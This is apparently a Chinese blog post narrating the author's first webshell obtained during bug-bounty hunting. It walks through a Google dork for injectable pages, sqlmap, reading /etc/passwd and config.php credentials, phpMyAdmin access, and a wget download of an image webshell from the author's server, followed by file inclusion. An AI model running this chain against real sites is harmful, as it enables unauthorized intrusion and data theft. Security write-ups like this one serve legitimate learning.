记自己第一个shell

闲着没事干挖挖src

利用谷歌语法搜索注入点
inurl:php?id= 公司

找到存在注入的站点

手工试了试没猜到管理员表
丢给sqlmap一把梭

跑出的密码是40位的SHA1加密 拿到好几个网站都没解开，只能找别的办法了

信息搜集

目录扫描

扫出一个爆出绝对路径的页面 //页面忘记保存了找不到了 不过我保存了路径
/var/www/html/system/library/mail.php
phpMyAdmin登录页面
还有一个不知道是什么的登录页面

有了绝对路径 就尝试手工SQL注入写入一句话 但是没成功
sqlmap尝试写shell

还是没有成功 应该没有写入权限
sqlmap获取sql-shell权限
看一下能不能读取文件
load_file(‘/etc/passwd’)

读出来了 但是解不开密
在这卡了一天，不知道从何下手了

转机

第二天突然想到可以获取数据库的账号密码来登录phpMyAdmin

获取到了 但还是解不开密码
我又苦想了半天
终于想到可以读一下网站的config.php配置文件 里面应该存着数据库的连接信息

看起来非常乱 复制到word里替换一下\r\n为回车 \t 为table建

然后就成功登录了phpMyAdmin
开始尝试导出一句话 日志写shell 但是都失败了
导出一句话导出失败
日志写shell也生成不了文件
general_log也打开了 路径也改了
但是就是生成不了日志，就很烦
就在快要放弃的时候 想起来还有个登录页面 不知道干什么的
就去读一下源码

结果直接读到了md5 还友情的写了注释//未加密的密文
登陆上去看看
结果竟然是个大马

应该是管理员留下的
但是没有写入权限 尝试上传文件 重命名文件都失败了
又发现还有个命令执行功能
看一下有没有写入权限

执行完没有反应 去访问下看看

发现写入成功了
激动的心颤抖的手 就当我以为终于拿到shell的时候
我发现一句话总是连接失败
于是就先写到txt里看一下

发现我的$_REQUEST被吞了
尝试了post get还有http头都失败了
只写$_POST也不行
拿出我的过waf一句话

可以看到 没有$_post什么的
传上去还是不行
想到上传图片马 再改名为php
//这里我是把图片马放到我服务器上 用wget http://www.xxx.org/xxxx/xxx.gif 命令下载到本地
结果访问php的时候显示404 就改成txt看一下
结果这操作我就懵了 txt当成gif执行

也不知道怎么回事 想别的办法吧
把传上去的图片马下载下来看看一句话还在不在
发现依然存在
又想到了文件包含来包含我的图片马

先写到txt看有没有被吞代码
发现并没有
再写到php文件 访问 包含成功
传参

成功执行一句话 连接蚁剑、

人生第一枚shell到手！！！

总结

信息搜集！！！
信息搜集！！！
信息搜集！！！
重要的事情说三遍 没下手点就信息搜集 最好拿个本本有分类的记下来 看的时候一目了然

其实我觉得这种漏洞管理员应该是知道的 可能他觉得危害不大 就没修复
因为好多人来了一看密文解不开 后台登不上就放弃了
毕竟我也搞了4，5天 才拿到shell
渗透测试就要多想 多试 不要轻易放弃